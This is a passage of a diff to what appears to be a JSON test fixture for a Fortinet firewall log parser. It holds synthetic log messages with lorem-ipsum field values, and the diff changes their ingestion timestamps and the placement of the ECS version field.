http_url=natu http_host=doei http_agent=acomm http_session_id=veleumi signature_subclass=volupt signature_id=6822 srccountry=itatise content_switch_name=ure server_pool_name=userro false_positive_mitigation=oree user_name=nimadmi monitor_status=utaliq http_refer=https://example.com/tinvolu/uredol.txt?did=lamcol#idolor http_version=tutlabor dev_id=nse threat_weight=rauto history_threat_weight=rese threat_level=nonproi ftp_mode=doconse ftp_cmd=henderi cipher_suite=tisunde msg_id=ende", "event": { - "ingested": "2021-12-09T13:37:31.907091800Z" + "ingested": "2021-12-14T14:43:11.779411650Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-2-10 time=12:23:41 logver=commod devid=oris devname=rcita logid=ataev type=oris subtype=incidi level=high vd=tutlabo srcip=10.32.66.161 srcport=881 srcintf=lo4523 dstip=10.134.238.8 dstport=2976 dstintf=enp0s1238 poluuid=edquiac sessionid=sit proto=HOPOPT action=allow policyid=olo trandisp=laboris duration=163.866000 sentbyte=7328 rcvdbyte=5375 devtype=tutl osname=nevolu osversion=1.5475 mastersrcmac=ostru srcmac=01:00:5e:e9:5f:84 crscore=157.516000 craction=aven crlevel=idolore eventtype=psaqu user=psa service=pta hostname=ididunt7607.mail.localhost profile=ntutlabo reqtype=leumiure url=https://mail.example.net/epteurs/usmodtem.gif?itvo=asi#tobe direction=internal msg=Lore method=oin cat=eritquii catdesc=taliqui device_id=ecatcu log_id=entoreve pri=high userfrom=umquam adminprof=onev timezone=CET main_type=tionev trigger_policy=ali sub_type=ionu severity_level=perna policy=moll src=10.242.178.15 src_port=3948 dst=10.217.111.77 dst_port=7309 http_method=datatno http_url=equepor http_host=antium http_agent=ugiatn http_session_id=utpe signature_subclass=hend signature_id=1170 srccountry=agnamali content_switch_name=ptateve server_pool_name=aliqua false_positive_mitigation=officiad user_name=nimadmin monitor_status=iavol http_refer=https://example.net/iumtota/qui.jpg?quel=ugitsed#ritatis http_version=olor dev_id=emoenim threat_weight=turadipi history_threat_weight=umSec threat_level=onsecte ftp_mode=inibusBo ftp_cmd=tqui cipher_suite=sequun msg_id=nimadm", "event": { - "ingested": "2021-12-09T13:37:31.907095800Z" + "ingested": "2021-12-14T14:43:11.779412048Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-2-24 time=7:26:15 logver=vitaedic devid=remip devname=rsita logid=rehe type=aper subtype=gnaa level=low vd=uta srcip=10.161.128.235 srcport=6280 srcintf=eth2121 dstip=10.84.29.117 dstport=1245 dstintf=eth7500 poluuid=errorsi sessionid=umwr proto=HOPOPT action=cancel policyid=cupida trandisp=rinc duration=5.709000 sentbyte=289 rcvdbyte=6059 devtype=dquia osname=ommod osversion=1.142 mastersrcmac=dico srcmac=01:00:5e:06:53:8a crscore=35.836000 craction=imipsa crlevel=iscinge eventtype=ora user=meumfug service=inimve hostname=mco2906.domain profile=sitvolu reqtype=eratv url=https://www.example.com/iadolo/cidu.txt?aliquide=redolori#eav direction=inbound msg=nse method=turQuis cat=tat catdesc=pta device_id=henderi log_id=onsec pri=high userfrom=itaspern adminprof=tau timezone=GMT+02:00 main_type=rsintoc trigger_policy=boreetd sub_type=rehende severity_level=sitamet policy=xerc src=10.199.119.251 src_port=7286 dst=10.86.152.227 dst_port=850 http_method=ant http_url=tiu http_host=ommodoco http_agent=rehe http_session_id=eseosqu signature_subclass=oeius signature_id=641 srccountry=eaqueip content_switch_name=laud server_pool_name=uido false_positive_mitigation=uis user_name=msequin monitor_status=autem http_refer=https://internal.example.org/ipi/qua.htm?itat=adipisc#omnisist http_version=orroqui dev_id=sci threat_weight=psamvolu history_threat_weight=itsedqui threat_level=oreve ftp_mode=omn ftp_cmd=onevol cipher_suite=ese msg_id=reprehen", "event": { - "ingested": "2021-12-09T13:37:31.907099800Z" + "ingested": "2021-12-14T14:43:11.779412616Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-3-11 time=2:28:49 logver=eumfugia devid=nimvenia devname=dol logid=rissusc type=lit subtype=quin level=low vd=eddoei srcip=10.35.73.208 srcport=7081 srcintf=eth6552 dstip=10.216.120.61 dstport=6389 dstintf=eth2068 poluuid=dolor sessionid=emUteni proto=tcp action=deny policyid=illoin trandisp=rinre duration=166.295000 sentbyte=5988 rcvdbyte=3374 devtype=olorem osname=mquae osversion=1.1789 mastersrcmac=rQuis srcmac=01:00:5e:b5:9a:3e crscore=5.250000 craction=enimadmi crlevel=elit eventtype=uia user=tem service=unt hostname=ntex5135.corp profile=mqua reqtype=equa url=https://internal.example.com/isc/umdol.jpg?atn=sectet#boreetd direction=outbound msg=olorin method=oluptat cat=olors catdesc=mSecti device_id=ius log_id=quian pri=low userfrom=urExce adminprof=upt timezone=PST main_type=pteurs trigger_policy=intocc sub_type=abo severity_level=orisnis policy=reseo src=10.239.194.105 src_port=3629 dst=10.234.171.117 dst_port=4488 http_method=tenatus http_url=odic http_host=ono http_agent=umtota http_session_id=consequ signature_subclass=ine signature_id=3409 srccountry=dex content_switch_name=ipis server_pool_name=nsecte false_positive_mitigation=miurere user_name=tat monitor_status=pitlabor http_refer=https://example.com/olupta/ape.jpg?mnisiut=eabil#olu http_version=uaUte dev_id=empor threat_weight=ate history_threat_weight=eca threat_level=inre ftp_mode=aliqu ftp_cmd=orem cipher_suite=dquian msg_id=isaute", "event": { - "ingested": "2021-12-09T13:37:31.907103300Z" + "ingested": "2021-12-14T14:43:11.779413055Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=emagnaal dtime=2018-03-25 09:31:24.032538723 +0000 UTC devid=uunturm devname=nonnumq vd=tqu date=2018-3-25 time=9:31:24 logid=ntocca type=emquelau subtype=adolorsi level=medium eventtime=maliquam logtime=ovol srcip=10.34.41.75 srcport=4436 srcintf=enp0s7638 srcintfrole=eseosqu dstip=10.249.16.201 dstport=4293 dstintf=lo5084 dstintfrole=mvele poluuid=qui sessionid=etMa proto=3 action=accept policyid=aspe policytype=uradipi crscore=22.220000 craction=atu crlevel=amremape appcat=illoinve service=uis srccountry=itanimi dstcountry=rinc trandisp=isistena tranip=10.107.168.208 tranport=1864 duration=45.477000 sentbyte=1067 rcvdbyte=2855 sentpkt=ctionofd app=uianonnu", "event": { - "ingested": "2021-12-09T13:37:31.907107700Z" + "ingested": "2021-12-14T14:43:11.779413472Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=nisiste date=2018-4-8 time=4:33:58 log_id=sedqu devid=itautfu devname=aaliq logid=tDui type=ernatur subtype=itsed level=low vd=xeacomm srcip=10.112.57.220 srcport=5803 srcintf=enp0s1897 dstip=10.19.151.236 dstport=884 dstintf=enp0s4144 poluuid=estiaeco sessionid=vele proto=HOPOPT action=allow policyid=yCiceroi trandisp=loremeu duration=156.263000 sentbyte=3719 rcvdbyte=7292 devtype=colab osname=itte osversion=1.6905 mastersrcmac=orumS srcmac=01:00:5e:c1:b8:93 crscore=60.950000 craction=uptat crlevel=incidun eventtype=agnaaliq user=aturQuis service=cepteurs hostname=tat1845.internal.invalid profile=rumetMal reqtype=tiumtot url=https://www.example.com/imadm/ugiat.txt?Nequepor=nisiu#ptat direction=inbound msg=eddoe method=seq cat=uae catdesc=tobeata device_id=ctas log_id=vol pri=high userfrom=gna adminprof=itautf timezone=ET main_type=eprehe trigger_policy=ariatu sub_type=aqueip severity_level=aqueip policy=rautod src=10.96.168.24 src_port=6206 dst=10.109.106.194 dst_port=5356 http_method=Sedut http_url=stiaec http_host=rveli http_agent=serr http_session_id=umdolo signature_subclass=iduntut signature_id=4281 srccountry=rorsitv content_switch_name=caboNemo server_pool_name=cididun false_positive_mitigation=iamqu user_name=ommodoc monitor_status=mwrit http_refer=https://www5.example.com/madminim/onse.txt?reeuf=orinrepr#tinvo http_version=oru dev_id=ainc threat_weight=aeab history_threat_weight=iat threat_level=acom ftp_mode=olo ftp_cmd=eipsaq cipher_suite=enatu msg_id=mfu", "event": { - "ingested": "2021-12-09T13:37:31.907113500Z" + "ingested": "2021-12-14T14:43:11.779413867Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=aliqui date=2018-4-22 time=11:36:32 log_id=uipexea devid=sauteiru devname=nibusB logid=eetdolo type=issuscip subtype=iduntu level=high vd=rinc srcip=10.109.224.208 srcport=1769 srcintf=enp0s3638 dstip=10.31.34.96 dstport=4651 dstintf=enp0s390 poluuid=atis sessionid=edol proto=icmp action=deny policyid=adip trandisp=ugiatq duration=128.795000 sentbyte=4249 rcvdbyte=6693 devtype=atemUte osname=emag osversion=1.1353 mastersrcmac=ecatcup srcmac=01:00:5e:63:85:d2 crscore=62.286000 craction=oin crlevel=isautem eventtype=eiusm user=assit service=ulpaq hostname=ulamc767.internal.lan profile=iades reqtype=mremape url=https://mail.example.net/ionemu/nul.jpg?volupt=ori#sed direction=inbound msg=maveniam method=ctobeat cat=emoenim catdesc=oqui device_id=olab log_id=remagnam pri=high userfrom=mSecti adminprof=volupt timezone=OMST main_type=ela trigger_policy=fugits sub_type=litseddo severity_level=idestl policy=ptasn src=10.112.155.228 src_port=5011 dst=10.47.191.95 dst_port=6242 http_method=velillu http_url=radipi http_host=iatn http_agent=aturE http_session_id=beat signature_subclass=pern signature_id=7568 srccountry=itvolupt content_switch_name=uradip server_pool_name=perspi false_positive_mitigation=uaer user_name=aed monitor_status=tectobe http_refer=https://example.org/scingeli/uatDuis.gif?apari=itesseci#utali http_version=ofdeFin dev_id=siutaliq threat_weight=urvel history_threat_weight=turE threat_level=ntium ftp_mode=imadmi ftp_cmd=dquiac cipher_suite=liquide msg_id=uatD", "event": { - "ingested": "2021-12-09T13:37:31.907119200Z" + "ingested": "2021-12-14T14:43:11.779414279Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=gnidolor dtime=2018-05-07 06:39:06.812538723 +0000 UTC devid=BCSedut devname=metco vd=vel date=2018-5-7 time=6:39:06 logid=tmol type=acommodi subtype=ccaecat level=low eventtime=mqu logtime=mips srcip=10.103.169.94 srcport=2174 srcintf=lo5821 srcintfrole=osqu dstip=10.140.137.17 dstport=446 dstintf=enp0s4444 dstintfrole=iono poluuid=atcupi sessionid=dexe proto=0 action=allow policyid=exerci policytype=ems crscore=15.728000 craction=nulapa crlevel=tess appcat=eroi service=enby srccountry=riatur dstcountry=amrema trandisp=illum tranip=10.62.241.218 tranport=7444 duration=5.969000 sentbyte=4832 rcvdbyte=6033 sentpkt=urere app=involu", "event": { - "ingested": "2021-12-09T13:37:31.907124900Z" + "ingested": "2021-12-14T14:43:11.779414727Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=tem devname=\"litsedq\" devid=\"amre\" vd=orpori date=2018-5-21 time=1:41:41 logid=sistena type=iam subtype=saquae level=low eventtime=itanimid logtime=ianonnum srcip=10.90.229.92 srcport=6796 srcintf=lo1752 srcintfrole=inculp dstip=10.251.212.166 dstport=3925 dstintf=eth1592 dstintfrole=aboNemo poluuid=tsedquia sessionid=ididun proto=21 action=cancel policyid=enim policytype=gnido crscore=85.453000 craction=erepr crlevel=tsedqu appcat=uisa service=uptat srccountry=siutal dstcountry=umetMalo trandisp=onevolu tranip=10.77.105.160 tranport=5541 duration=155.903000 sentbyte=5294 rcvdbyte=2687 sentpkt=ira app=umfu", "event": { - "ingested": "2021-12-09T13:37:31.907130500Z" + "ingested": "2021-12-14T14:43:11.779415261Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-6-4 time=8:44:15 logver=uamq devid=mnisist devname=dutp logid=ecillu type=ipsaqu subtype=asun level=very-high vd=llumd srcip=10.100.223.157 srcport=1307 srcintf=eth5742 dstip=10.232.243.87 dstport=4546 dstintf=lo299 poluuid=atisetq sessionid=mSectio proto=0 action=cancel policyid=nonnumqu trandisp=atis duration=63.050000 sentbyte=3508 rcvdbyte=205 devtype=uam osname=tisunde osversion=1.4261 mastersrcmac=rured srcmac=01:00:5e:8a:c1:2a crscore=19.243000 craction=meumfug crlevel=iam eventtype=animi user=porainc service=nsectetu hostname=spici5547.internal.test profile=tate reqtype=sintocca url=https://mail.example.org/asuntex/uovolup.html?amali=uiav#henderi direction=internal msg=tnul method=ons cat=radip catdesc=amremap device_id=dolorsit log_id=atisund pri=very-high userfrom=uredo adminprof=uamni timezone=CT main_type=quisqua trigger_policy=sedquian sub_type=lamcorpo severity_level=rem policy=apariat src=10.216.49.112 src_port=4521 dst=10.112.242.68 dst_port=3105 http_method=aut http_url=eriti http_host=ipsum http_agent=com http_session_id=uptate signature_subclass=tevelite signature_id=5880 srccountry=nimadmi content_switch_name=mquiado server_pool_name=agn false_positive_mitigation=dip user_name=urmag monitor_status=nim http_refer=https://www5.example.net/tutlabo/incid.gif?ptate=tconsect#usm http_version=uunturma dev_id=namaliqu threat_weight=tatemacc history_threat_weight=licab threat_level=roidents ftp_mode=volupta ftp_cmd=stiaeco cipher_suite=tanim msg_id=osam", "event": { - "ingested": "2021-12-09T13:37:31.907136200Z" + "ingested": "2021-12-14T14:43:11.779416324Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-6-19 time=3:46:49 logver=tla devid=nimve devname=edutpe logid=tenb type=billoinv subtype=asia level=medium vd=paquioff srcip=10.252.175.174 srcport=1995 srcintf=enp0s1531 dstip=10.196.226.219 dstport=545 dstintf=lo2390 poluuid=uaera sessionid=nsequa proto=tcp action=accept policyid=orporis trandisp=oluptate duration=28.731000 sentbyte=2397 rcvdbyte=1768 devtype=itvolu osname=citation osversion=1.491 mastersrcmac=aincid srcmac=01:00:5e:7e:ea:3f crscore=149.960000 craction=tNeque crlevel=uidolore eventtype=uatDuisa user=usB service=magnaali hostname=istenatu3686.invalid profile=remagna reqtype=eritqu url=https://example.org/mnisiut/porinci.htm?norum=emUten#dminimve direction=internal msg=oremagna method=nulamc cat=tempori catdesc=rsintocc device_id=nderit log_id=etco pri=very-high userfrom=lore adminprof=ameiusmo timezone=PT main_type=veniamqu trigger_policy=equat sub_type=reeu severity_level=atemacc policy=rsitvolu src=10.182.58.108 src_port=4811 dst=10.96.100.84 dst_port=2253 http_method=utlabore http_url=texplica http_host=boru http_agent=ntut http_session_id=elaud signature_subclass=acomm signature_id=5667 srccountry=emUten content_switch_name=uamni server_pool_name=laboris false_positive_mitigation=pers user_name=lpaquiof monitor_status=isisten http_refer=https://api.example.net/seddoei/rnatur.jpg?olores=idolorem#umdolors http_version=uid dev_id=numqua threat_weight=citatio history_threat_weight=sed threat_level=mUten ftp_mode=eursint ftp_cmd=velillum cipher_suite=oin msg_id=teurs", "event": { - "ingested": "2021-12-09T13:37:31.907141800Z" + "ingested": "2021-12-14T14:43:11.779417178Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=untutl devname=\"cons\" devid=\"vel\" vd=illumdo date=2018-7-3 time=10:49:23 logid=rios type=deF subtype=dutpe level=very-high eventtime=itan logtime=uisnos srcip=10.228.61.5 srcport=1179 srcintf=eth4741 srcintfrole=lites dstip=10.246.41.77 dstport=1217 dstintf=lo7502 dstintfrole=olu poluuid=ectet sessionid=tquovo proto=17 action=block policyid=lapa policytype=xeacom crscore=22.822000 craction=qui crlevel=henderi appcat=rainc service=dminim srccountry=sse dstcountry=tatem trandisp=umexe tranip=10.157.22.21 tranport=5252 duration=135.630000 sentbyte=2167 rcvdbyte=2952 sentpkt=quamei app=nvento", "event": { - "ingested": "2021-12-09T13:37:31.907147500Z" + "ingested": "2021-12-14T14:43:11.779417971Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=qua devname=\"llumdo\" devid=\"tot\" vd=itquii date=2018-7-17 time=5:51:58 logid=psu type=iat subtype=ept level=high eventtime=ectob logtime=aUtenim srcip=10.242.119.111 srcport=645 srcintf=lo1640 srcintfrole=tDuisa dstip=10.239.231.168 dstport=88 dstintf=lo3385 dstintfrole=nimi poluuid=niamqu sessionid=uioffi proto=1 action=allow policyid=consequa policytype=tionu crscore=60.452000 craction=quines crlevel=entsu appcat=ineavol service=abor srccountry=giatq dstcountry=nonpro trandisp=elitsedd tranip=10.188.131.18 tranport=981 duration=46.954000 sentbyte=2770 rcvdbyte=4226 sentpkt=tam app=uovo", "event": { - "ingested": "2021-12-09T13:37:31.907153300Z" + "ingested": "2021-12-14T14:43:11.779418614Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=orinrepr date=2018-8-1 time=12:54:32 log_id=untut devid=siu devname=lorem logid=icons type=hende subtype=umdol level=medium vd=psaq srcip=10.24.154.250 srcport=2108 srcintf=eth2707 dstip=10.124.187.230 dstport=6119 dstintf=lo105 poluuid=mqu sessionid=tse proto=udp action=accept policyid=ueip trandisp=amvo duration=20.956000 sentbyte=2068 rcvdbyte=306 devtype=reetdolo osname=tten osversion=1.979 mastersrcmac=usa srcmac=01:00:5e:6a:a6:c9 crscore=45.307000 craction=oremagna crlevel=siuta eventtype=amnihil user=nderit service=ficia hostname=tru3812.mail.lan profile=olo reqtype=xer url=https://api.example.net/nsec/smo.gif?etq=trumexe#rai direction=outbound msg=tNequepo method=byCicer cat=imvenia catdesc=ipit device_id=tdolorem log_id=nderitin pri=low userfrom=enderitq adminprof=amvolu timezone=GMT-07:00 main_type=temvele trigger_policy=ofd sub_type=quam severity_level=umdol policy=porincid src=10.106.101.87 src_port=7569 dst=10.247.124.74 dst_port=2491 http_method=inea http_url=ipsu http_host=iden http_agent=oreseo http_session_id=edictasu signature_subclass=aerat signature_id=4358 srccountry=lites content_switch_name=col server_pool_name=litsedd false_positive_mitigation=mnis user_name=ainci monitor_status=aturve http_refer=https://api.example.com/mporain/secte.txt?amqui=rume#uptate http_version=tisundeo dev_id=uid threat_weight=eFini history_threat_weight=mnis threat_level=tametco ftp_mode=snisiut ftp_cmd=lit cipher_suite=laborio msg_id=aaliqu", "event": { - "ingested": "2021-12-09T13:37:31.907159Z" + "ingested": "2021-12-14T14:43:11.779419478Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-8-15 time=7:57:06 devname=mid device_id=henderi log_id=consec type=event subtype=dquia pri=high desc=isiutali user=rehe userfrom=volupta msg=etcons action=deny adom=etdol408.internal.home session_id=agnamali", "event": { - "ingested": "2021-12-09T13:37:31.907181100Z" + "ingested": "2021-12-14T14:43:11.779422124Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-8-29 time=2:59:40 logver=cae devid=Utenimad devname=onsequ logid=Bon type=amquisno subtype=mullam level=very-high vd=admi srcip=10.111.106.60 srcport=5449 srcintf=lo5820 dstip=10.142.181.192 dstport=4386 dstintf=lo6200 poluuid=lmolest sessionid=miurerep proto=17 action=allow policyid=Sed trandisp=isau duration=66.574000 sentbyte=75 rcvdbyte=806 devtype=idest osname=ostru osversion=1.4342 mastersrcmac=enimip srcmac=01:00:5e:11:d6:5d crscore=66.141000 craction=umquiado crlevel=taspe eventtype=empori user=mipsum service=tium hostname=riaturE1644.www5.example profile=ender reqtype=uine url=https://internal.example.com/dolo/exeacom.txt?tlab=eufugiat#upta direction=internal msg=reetdo method=mad cat=mdolor catdesc=amcorpor device_id=oremquel log_id=san pri=high userfrom=amqui adminprof=itatise timezone=GMT-07:00 main_type=cia trigger_policy=lup sub_type=cipitla severity_level=niam policy=mullamc src=10.215.144.167 src_port=6675 dst=10.162.114.52 dst_port=2925 http_method=quepor http_url=Lor http_host=ten http_agent=exeacomm http_session_id=cusan signature_subclass=oquisq signature_id=4993 srccountry=ihilmol content_switch_name=seosqui server_pool_name=tiset false_positive_mitigation=ciade user_name=erspici monitor_status=xercitat http_refer=https://internal.example.net/utlab/entoreve.html?umdol=nseq#autodita http_version=loreme dev_id=eratv threat_weight=tametcon history_threat_weight=orsi threat_level=ull ftp_mode=mcor ftp_cmd=iamquis cipher_suite=aeabi msg_id=ore", "event": { - "ingested": "2021-12-09T13:37:31.907186800Z" + "ingested": "2021-12-14T14:43:11.779423042Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-9-12 time=10:02:15 logver=catcup devid=ectetur devname=cons logid=spiciati type=upidata subtype=utlabo level=high vd=ersp srcip=10.101.207.156 srcport=2086 srcintf=enp0s4931 dstip=10.12.8.82 dstport=4369 dstintf=enp0s7520 poluuid=nemull sessionid=trumex proto=6 action=accept policyid=doloremq trandisp=iade duration=26.420000 sentbyte=5013 rcvdbyte=7641 devtype=uidolo osname=ita osversion=1.6452 mastersrcmac=rchite srcmac=01:00:5e:41:90:bf crscore=107.693000 craction=tionem crlevel=volupta eventtype=adol user=econsequ service=orever hostname=mdolo7008.api.corp profile=reetdolo reqtype=psam url=https://www5.example.org/orumet/aliqu.txt?tion=sun#utod direction=outbound msg=rinci method=uamestqu cat=riatu catdesc=ulaparia device_id=remagna log_id=fugi pri=very-high userfrom=xerc adminprof=caecat timezone=OMST main_type=cor trigger_policy=nonnumqu sub_type=uidexea severity_level=emu policy=asia src=10.162.128.87 src_port=6214 dst=10.78.75.82 dst_port=7799 http_method=uptat http_url=con http_host=tem http_agent=orpori http_session_id=lor signature_subclass=quiinea signature_id=7098 srccountry=rroquis content_switch_name=dolorema server_pool_name=prehe false_positive_mitigation=bori user_name=Sedutp monitor_status=ritinvo http_refer=https://internal.example.net/ica/nat.jpg?ddoe=nsequ#lloinve http_version=tdolo dev_id=billoi threat_weight=sequu history_threat_weight=ffic threat_level=imadmini ftp_mode=isnostru ftp_cmd=ostr cipher_suite=tinvo msg_id=lorumwr", "event": { - "ingested": "2021-12-09T13:37:31.907192400Z" + "ingested": "2021-12-14T14:43:11.779423724Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=ctetura devname=\"reseosqu\" devid=\"ittenbyC\" vd=tlabor date=2018-9-27 time=5:04:49 logid=auteir type=uredolo subtype=uido level=medium eventtime=quiratio logtime=aincidu srcip=10.75.198.93 srcport=1982 srcintf=eth725 srcintfrole=umqu dstip=10.137.36.151 dstport=196 dstintf=lo1813 dstintfrole=rspici poluuid=duntutla sessionid=emeu proto=1 action=block policyid=atemUten policytype=turadipi crscore=16.226000 craction=estqu crlevel=orinre appcat=prehen service=equa srccountry=ciatisun dstcountry=mdolorem trandisp=nnumq tranip=10.51.106.43 tranport=6486 duration=78.551000 sentbyte=3531 rcvdbyte=5464 sentpkt=oremeumf app=volupt", "event": { - "ingested": "2021-12-09T13:37:31.907198200Z" + "ingested": "2021-12-14T14:43:11.779424407Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=tnulapa devname=\"caecatcu\" devid=\"xcepte\" vd=deserun date=2018-10-11 time=12:07:23 logid=mvol type=erep subtype=teurs level=low eventtime=tiumdol logtime=byCicer srcip=10.154.151.111 srcport=5860 srcintf=eth1273 srcintfrole=uisnos dstip=10.7.230.206 dstport=5757 dstintf=lo1291 dstintfrole=pisc poluuid=eumfu sessionid=tseddoe proto=HOPOPT action=allow policyid=emulla policytype=bill crscore=147.522000 craction=oditaut crlevel=oloremqu appcat=untNeque service=reetdol srccountry=perspi dstcountry=tlab trandisp=udexerci tranip=10.249.93.150 tranport=799 duration=113.020000 sentbyte=2808 rcvdbyte=5744 sentpkt=ovolup app=squ", "event": { - "ingested": "2021-12-09T13:37:31.907206800Z" + "ingested": "2021-12-14T14:43:11.779425100Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-10-25 time=7:09:57 logver=dolor devid=lit devname=ptatem logid=oeiusmod type=ugi subtype=utaliq level=very-high vd=toc srcip=10.76.177.154 srcport=1428 srcintf=eth4425 dstip=10.207.160.170 dstport=7037 dstintf=lo1570 poluuid=reseo sessionid=iration proto=tcp action=deny policyid=magn trandisp=iaecon duration=54.100000 sentbyte=622 rcvdbyte=6280 devtype=ill osname=oris osversion=1.5718 mastersrcmac=ulamcol srcmac=01:00:5e:19:ce:4b crscore=142.771000 craction=oNe crlevel=utfu eventtype=santiumd user=cididunt service=ctasu hostname=itse5466.api.example profile=ica reqtype=mnisis url=https://internal.example.com/nonnumqu/isciveli.gif?wri=aute#iscin direction=outbound msg=uat method=itasper cat=nibusBo catdesc=volupta device_id=olorinr log_id=iameaq pri=high userfrom=docons adminprof=uun timezone=OMST main_type=mremap trigger_policy=ate sub_type=agnaal severity_level=ibusB policy=mexe src=10.217.209.221 src_port=3639 dst=10.26.4.3 dst_port=5291 http_method=rsitame http_url=eca http_host=quirat http_agent=urmagn http_session_id=essec signature_subclass=prehende signature_id=1261 srccountry=setquas content_switch_name=nti server_pool_name=osamnis false_positive_mitigation=atisetqu user_name=ciduntut monitor_status=atisu http_refer=https://internal.example.com/architec/incul.txt?aborios=mco#amnisiu http_version=suntincu dev_id=lore threat_weight=equatu history_threat_weight=enbyCi threat_level=dolo ftp_mode=adipi ftp_cmd=beata cipher_suite=evelites msg_id=ipiscive", "event": { - "ingested": "2021-12-09T13:37:31.907212300Z" + "ingested": "2021-12-14T14:43:11.779425756Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=umtot date=2018-11-9 time=2:12:32 log_id=eumiurer devid=inv devname=eac logid=rainc type=tinculp subtype=uianon level=high vd=corpori srcip=10.232.131.132 srcport=581 srcintf=enp0s6255 dstip=10.232.246.98 dstport=1854 dstintf=enp0s1526 poluuid=ivelit sessionid=itlabori proto=icmp action=accept policyid=oide trandisp=magni duration=72.993000 sentbyte=5817 rcvdbyte=6960 devtype=rrorsit osname=emipsu osversion=1.6603 mastersrcmac=temUte srcmac=01:00:5e:fe:be:28 crscore=134.746000 craction=hitec crlevel=sci eventtype=luptatev user=ruredo service=iamquis hostname=dquiac6194.api.lan profile=nidolo reqtype=runtmoll url=https://www5.example.org/utlabo/scip.html?voluptas=inv#upta direction=external msg=ors method=olupta cat=raincidu catdesc=nisi device_id=uipexea log_id=taedic pri=high userfrom=ugi adminprof=urExcep timezone=CET main_type=usant trigger_policy=uidolore sub_type=litse severity_level=ugitse policy=utfugi src=10.241.140.241 src_port=1813 dst=10.180.162.174 dst_port=7186 http_method=ido http_url=atnu http_host=ssuscipi http_agent=evita http_session_id=tconsect signature_subclass=lpaquiof signature_id=532 srccountry=lors content_switch_name=Finibus server_pool_name=totam false_positive_mitigation=idat user_name=nulapar monitor_status=git http_refer=https://www5.example.com/odtem/tati.jpg?ueips=umqu#ntexpli http_version=siuta dev_id=porincid threat_weight=itame history_threat_weight=inv threat_level=remaper ftp_mode=quaUteni ftp_cmd=evelit cipher_suite=oluptat msg_id=ditem", "event": { - "ingested": "2021-12-09T13:37:31.907216900Z" + "ingested": "2021-12-14T14:43:11.779426287Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-11-23 time=9:15:06 devname=oditautf device_id=asiarc log_id=eddoei type=generic subtype=iatqu pri=very-high devid=itessec devname=dat logid=tdol type=emul subtype=ariatu level=high vd=reseo srcip=10.53.70.207 srcport=1793 srcintf=lo2279 dstip=10.73.140.61 dstport=2114 dstintf=lo368 poluuid=stlabo sessionid=atema proto=1 action=deny policyid=orporiss trandisp=iamq duration=128.426000 sentbyte=1800 rcvdbyte=5783 devtype=pis osname=riosam osversion=1.2052 mastersrcmac=iosam srcmac=01:00:5e:21:d3:0a crscore=65.426000 craction=archi crlevel=nes eventtype=atvolupt user=umwritt service=uae hostname=amco1592.mail.host profile=aaliq reqtype=olupta url=https://internal.example.com/ssusci/snostrud.txt?dolo=siutaliq#obeata direction=outbound msg=tame method=olo cat=vel catdesc=equamn device_id=tempora log_id=enimip pri=very-high userfrom=saqua adminprof=aperia timezone=OMST main_type=tNeque trigger_policy=metcon sub_type=enimadmi severity_level=orem policy=corpor src=10.110.99.222 src_port=5685 dst=10.62.140.108 dst_port=1225 http_method=ssitasp http_url=ptat http_host=asp http_agent=uatDui http_session_id=nofdeFin signature_subclass=unde signature_id=3979 srccountry=seruntm content_switch_name=aera server_pool_name=scive false_positive_mitigation=ngelit user_name=moenimi monitor_status=mqu http_refer=https://mail.example.org/ueipsaq/upid.gif?utla=emUte#tisund http_version=tutla dev_id=isund threat_weight=atemU history_threat_weight=uidex threat_level=uptate ftp_mode=eac ftp_cmd=peria cipher_suite=amaliq msg_id=ium", "event": { - "ingested": "2021-12-09T13:37:31.907221300Z" + "ingested": 